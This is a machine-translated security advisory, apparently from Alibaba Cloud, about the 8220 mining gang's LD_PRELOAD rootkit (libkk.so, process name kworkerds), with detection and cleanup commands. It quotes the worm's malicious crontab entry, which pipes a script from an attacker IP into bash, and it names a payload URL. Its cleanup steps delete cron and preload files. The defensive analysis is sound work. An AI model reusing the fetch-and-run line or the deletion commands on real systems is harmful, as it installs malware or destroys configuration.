Threat Letters | 8220 mining gang evolution, the rise of mining rootkit trend

Recently, the team found that Ali cloud security 8220 mining groups for a more permanent resident host to get the maximum benefit, start using rootkit techniques to hide themselves. Such hiding technology trends began to gradually spread the use and evolution of mining worms and other watchdogs after use, then hide and is expected to fight on the host side will become mainstream.

background

Ali cloud monitoring platform security team found worms download scripts 8220 mining gangs appear update, in addition to download the necessary script resides, mining program, the new addition of a so Download file: http://107.174.47.156/ 1.so .

8220 mining gang is a long-term active attacks using multiple vulnerabilities and deploy mining program of domestic groups [1-2], the gang using a combination of WebLogic XMLDecoder deserialization vulnerability (CVE-2017-10271), Drupal RCE ( CVE-2018-7600), JBoss deserialization command execution vulnerability (CVE-2017-12149), and other vulnerabilities to attack and deploy mining program for profit.

By a simple analysis of the relevant scripts and so, we confirm that 8220 has been coated using ProcessHider gang in their attack tools [3] to hide itself. ProcessHider is widely utilized numerous malware rootkit. Mining worm uses this tool enables administrators mining process difficult to detect by conventional means, thereby increasing survival time mining mining process to maximize revenue. Over time, there may be more and more mining worm added rootkit functionality.

Worm detection

If you see a significant increase in CPU, the overall performance of the machine in the cloud Caton console, but the login machine uses PS / TOP commands can not locate the specific CPU-intensive process, this time the machine is likely to have been infected with such use rootkit the mining worms hide.

1. Host Detection

The worm exploits LD_PRELOAD mechanism, making themselves so files to load on the system, and by hijacking readdir function, so that depend returned by the API PS / TOP systems command does not return results correctly. Therefore, users of the affected system commands will not see real progress.

As shown above, the worm hidden processes keyword is kworkerds.

The worm can be detected using the following command on the host side

查看动态链接库
#ldd /bin/top|grep usr
  /usr/local/lib/libkk.so (0x00007f0f94026000)
发现存在异常的so文件

查看 PRE_LOAD系统变量
#cat /etc/ld.so.preload 
  /usr/local/lib/libkk.so
发现preload文件被修改

查看 crontab
#crontab -l
  */30 * * * *  (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
发现crontab出现奇怪的定时任务

Use common top view of the process:

LD_PRELOAD rely on dynamic linking process, the use of static compiled busybox top command execution, will be able to see the whole process real.

2. Network Detection

With the escalating confrontation, mining worm of self-hide feature will continue to upgrade the face of heavily armed worms, ordinary users on the host side were extremely strong against its cost and low income. Such worms detected for more efficiently through the network side, NTA (Network Traffic Analysis) function. Because no matter what the attacker uses a hidden way in the host side, but its remote download, C & C communications, mining and other acts pools communications will leave marks in network traffic.

The figure is found in the recording of the worm network firewall cloud by detecting downloading of the infected host file backdoor behavior.

Rehabilitation program

1. Since the local command may have been hijacked, so the first download statically compiled busybox to execute instructions to ensure implementation of the system of command is not hijacked affected.

下载二进制
#wget https://www.busybox.net/downloads/binaries/1.27.1-i686/busybox
赋予执行权限
#chmod +x busybox

2. Clean dynamic hijacking

./busybox rm -f  /usr/local/lib/libkk.so 2>/dev/null
./busybox chattr -i /etc/ld.so.preload 2>/dev/null
./busybox chattr -i /usr/local/lib/libkk.so 2>/dev/null
./busybox rm -f /etc/ld.so.preload
./busybox touch /etc/ld.so.preload
./busybox chattr +i /etc/ld.so.preload
ldconfig

3. kill malicious processes and related documents

./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep 'kworkerds' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null
./busybox ps -ef | ./busybox grep -v grep | ./busybox egrep '107.174.47.156' | ./busybox awk '{print $1}' |./busybox sed "s/root//g" | ./busybox xargs kill -9  2>/dev/null
./busybox rm -f /var/tmp/kworkerds
./busybox rm -f /var/tmp/sustse*

4. Repair crontab

./busybox chattr -i  /etc/cron.d/root  2>/dev/null
./busybox rm -f /etc/cron.d/root
./busybox chattr -i /etc/cron.d/apache  2>/dev/null
./busybox rm -f /var/spool/cron/apache
./busybox chattr -i /var/spool/cron/root  2>/dev/null
./busybox rm -f /var/spool/cron/root
./busybox chattr -i /var/spool/cron/crontabs/root  2>/dev/null
./busybox rm -f /var/spool/cron/crontabs/root
./busybox rm -rf /var/spool/cron/crontabs
./busybox touch /var/spool/cron/root
./busybox chattr +i /var/spool/cron/root

5. Repair Under crontab again, go back to step 3 to perform again

6 .. repair is complete and restart the crontab

service crond start

REF:

1. Suspected domestic sources "8220 mining gangs" trace traceability analysis [ https://www.freebuf.com/column/179970.html]

2. "8220 gang" Recent activity analysis: mining and extortion Trojan virus Dancing [ https://www.freebuf.com/column/186467.html]

3. https://github.com/gianlucaborello/libprocesshider